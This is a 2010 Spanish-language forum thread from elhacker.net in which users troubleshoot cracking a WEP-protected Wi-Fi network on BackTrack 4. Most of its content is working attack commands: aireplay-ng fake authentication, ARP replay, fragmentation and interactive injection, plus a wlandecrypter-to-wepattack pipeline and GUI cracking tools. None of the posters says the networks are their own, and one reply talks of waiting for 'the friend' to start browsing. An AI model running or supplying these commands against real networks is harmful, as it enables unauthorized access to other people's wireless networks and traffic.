Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: milin99 en 21 Diciembre 2010, 18:04 pm



Título: ataque 5+2 y1+3
Publicado por: milin99 en 21 Diciembre 2010, 18:04 pm
Hola buenas, ahi va una duda al inyectar trafico en BT4 con aireplay en una señal wep que aparece con los datas en 0:
-empiezo con el ataque 1+3:
-aireplay-ng -1 0 -a bssid -h 00:11:22:33:44:55 mon0
-aireplay-ng -3 -b bssid -h 00:.... mon0
-AQUI NO CONSIGO QUE SUBAN, O LO QUE PRUEBO CON:
-aireplay-ng -5 -b bssid -h 00:.. mon0
-aireplay-ng -2 -p0841 -b bssid -c ff:ff:ff:ff:ff:ff -h 00:.. mon0
- COMO SIGUE SIN SUBIR,EMPIEZO A PROBAR COSAS:
-aireplay-ng -1 30 -0 1 -e essid -a bssid -h 00:.. mon0
-aireplay-ng -2 -p 0841 -c ff:... -b bssid -h 00:.. mon0(ESTE ATAQUE LO SAQUE DEL FORO DE ALGUIEN QUE LO ACONSEJABA SI FALLABA EL 1+3).
-Y por ultimo, ya con la paciencia agotada, empiezo a cruzar ataques entre los que aqui pongo( decir que consegui que subiera una vez, pero no me acuerdo la combinacion ,jeje), así que si alguien puede echar luz a esto AGRADEEECIDO.


Título: Re: ataque 5+2 y1+3
Publicado por: Devilboy.Devil en 21 Diciembre 2010, 18:14 pm
Prueba esto:

http://foro.elhacker.net/wireless_en_linux/crackear_wep_con_wepcrack_gui-t314422.0.html


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 22 Diciembre 2010, 16:35 pm
prueba esto tambien
(http://img51.imageshack.us/img51/5527/capturefol.png)


Título: Re: ataque 5+2 y1+3
Publicado por: milin99 en 22 Diciembre 2010, 21:09 pm
ok amigo, voy a probar y ya te cuen, entiendo que los parametros los pongo tal cual estan sin cambiar nada no?, bueno lo dicho, te comento, a devilboy decir que gracias pero no me arranca con bt4, me bajo la aplicacion y cuando le doy al archivo ejecutable no me deja instalarlo, gracias y os comento.


Título: Re: ataque 5+2 y1+3
Publicado por: Devilboy.Devil en 22 Diciembre 2010, 21:11 pm
ok amigo, voy a probar y ya te cuen, entiendo que los parametros los pongo tal cual estan sin cambiar nada no?, bueno lo dicho, te comento, a devilboy decir que gracias pero no me arranca con bt4, me bajo la aplicacion y cuando le doy al archivo ejecutable no me deja instalarlo, gracias y os comento.

posiblemente tengas que instalar el monodevelop

haz lo sig.

sudo apt-get install monoDevelop

o desde synaptic


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 22 Diciembre 2010, 23:08 pm
mira si no tienes interned prueva a meterlo en un usb los paquetes  wlandecrypter y  wepattack
aver si se instala eso no lo intente yo nunca alomejor te va  y si llegas a instalarlo con 1data que te consigas tendras la clave  o 4como mucho
wlandecrypter ESSID WLAN_XX | wepattack -f *.cap

la verdad esque no seme ocurre nada  :-X




Título: Re: ataque 5+2 y1+3
Publicado por: milin99 en 22 Diciembre 2010, 23:59 pm
bueno. ahi va otro lio:
-metiendo los comandos que me facilita el compi dvdr, sale lo siguiente, mejor empiezo detallando uno por uno y si la pinto pues me corregis:
-airmon-ng stop wlan0
-ifconfig wlan0 down
-macchanger -m 00:11...wlan0
-airmon-ng start wlan0
-airodump-ng --encrypt wep mon0
-airodump-ng -d bssid -c canal -w capturamos.EN.file mon0
-hasta aqui no hay problema
-aireplay-ng -1 30 -q120 -e essid -a ap -h 00:::-o(es una o no?) 0 mon0
-seguimos con los datas en cero patatero, en alguna ocasion sale el error "denied (code12), wrong essid or wpa? SI ALGUIEN SABE CUANDO SALE ESTO, ESTARIA BIEN SABERLO, continuamos:
-aireplay-ng -3 -b ap -h 00::: mon0
SEGUIMOS EN CERO DATAS, empieza a leer packets, pero ningun arp ni acks ni nada, POR lo que pasamos directamente a fragmentacion:
-aireplay-ng -5 -b bssid -h 00:... mon0
ni un  miserable data, lo mas que consigo es :saving ARP request in replay arp-xxx-xxxxxx.cap(SI ALGUIEN SABE SI SE PUEDE APROVECHAR ESTE ARCHIVO PARA ALGO, PUES GRACIAS), DE ARCHIVO FRAGMENT NI RASTRO, asi que como soy muy pesao:
-aireplay-ng -2 -p 0841 -b bssi -c ff;ff.... -h 00;; mon0
-aireplay-ng -2 -p0841 -m68 -n86 -b bssid -c ff:ff.. -h 00:11... mon0
Y NÁ DE NÁ, asi que si alguien tiene mas metralla le seguimos dando, un saludete.


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 23 Diciembre 2010, 00:24 am
no entiendo que as hecho hay es wep o wpa la que quieres cojer

utiliza grim wepa  tienes el link del tutorial que subi

(http://img805.imageshack.us/img805/3403/instantnea8.png)


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 24 Diciembre 2010, 16:50 pm
bueno la verdad esque me lie con backtrack con una red que tengo y con 0 datas que me salia usa los mismos comandos que tedi y despues de mucho pero de mucho tiempo no empezo a arrancar las datas ...me supongo que algo tiene que ver con que el amigo este navegando asi que debes dejarlo asta que el amigo conecte

---------------------------------------------bueno ase poco tedieron un post
que probe y ba ala perfaccion y es comodo yo no lo sabia pero lo e usado y va como la seda y es rapidimo

(http://img703.imageshack.us/img703/7156/pantallazodi.png)
(http://img593.imageshack.us/img593/6118/pantallazo1l.png)
(http://img502.imageshack.us/img502/2520/pantallazo2d.png)

tu problema es que no lo puedes meter en el linux no pasa nada me ocurria lo mismo
cojete el paquete de wepcrack y lo descomprime en el escritorio --osea --estraer aqui  y te saldra una carpeta

habres una consola y pones esto:

cd WepCrack

chmod +x wepcrack

sh wepcrack


y bueno ya te abra saltado el programa y nada mas salu2


Título: Re: ataque 5+2 y1+3
Publicado por: milin99 en 25 Diciembre 2010, 23:20 pm
Es que otro problema que me da es que no me deja usar ningun programa dentro de bt4, se me abre una ventana en ingles que me dice "abrir con" y cuando selecciono cualquier opcion me pide una clave...lo dicho en cuanto pruebe bt4 r1 te digo algo compi, saludos.


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 25 Diciembre 2010, 23:29 pm
eso esta hecho con mint 10 y nolo tengo parcheado esta con el problema con ficed channel mono -1

pero sin embargo con este programa meda la clave

ves lo que pone  te lo he puesto por si utilizabas un linux  perdon

(http://img228.imageshack.us/img228/1517/pantallazo4r.png)


Título: Re: ataque 5+2 y1+3
Publicado por: milin99 en 26 Diciembre 2010, 18:40 pm
hola, no entiendo muy bien este ultimo post, comntarte que ya utiliza bt4 r1, que tiene grimwepa, ya estudiare el tuto, que me he conectado a internet pero no me encuentra ninguna pagina y posteriormente he intentado meter los comandos que me pasaste de wlandepcrypter y me ha dado error en el tercer comando (sudo apt-get update), y a mi me da que es algo de internet, a ver si me puedes decir como puedo arrancar bien internet desde bt4r1, la clave me la coge y al utilizar mozilla como buscador lo mas que busca es google, las paginas me da " no encontrado", ademas el led de la antena es muy debil, bueno un saludo, ya te cuen.


Título: Re: ataque 5+2 y1+3
Publicado por: dvdr en 26 Diciembre 2010, 19:30 pm
sudo apt-get install libssl-dev
sudo apt-get install zlib1g zlib1g-dev
sudo apt-get update



wget -c http://www.wifiway.org/archivos/wlandecrypter-1.1.tar.gz
tar zxvf wlandecrypter-1.1.tar.gz
cd wlandecrypter-1.1/
sudo make clean && make && make install

seguro no estas conectado

-------------------------------------------------------intenta esto-------------------------

1) Abrir una consola y escribir lo siguiente: " wicd-client --no-tray " (sin comillas). Con esto abriremos el Wicd Network Manager en su forma grafica, lo que hará más facil que se puedan conectar a internet. Verán que es similar al de windows. Si no funciona con esa linea de comandos usen " wicd-client ". Estas dos opciones son en caso que no lo puedan hacer desde el menu del escritorio (menu > internet > Wicd Network Manager).

2) Si al tener abierto el wicd observas que no detecta ninguna red, es por que su interface (wlan0, ath0) se encuentra en modo monitor. Asi que deberan apagar este modo. En otra consola escriban lo siguiente: " airmon-ng stop wlan0 ". En este ejemplo la interface es wlan0, pero tambien pudo ser ath0. Pongan la que corresponda. Si no conocen su interface, en la consola solo escriban " airmon-ng " y les indicara cual tienen.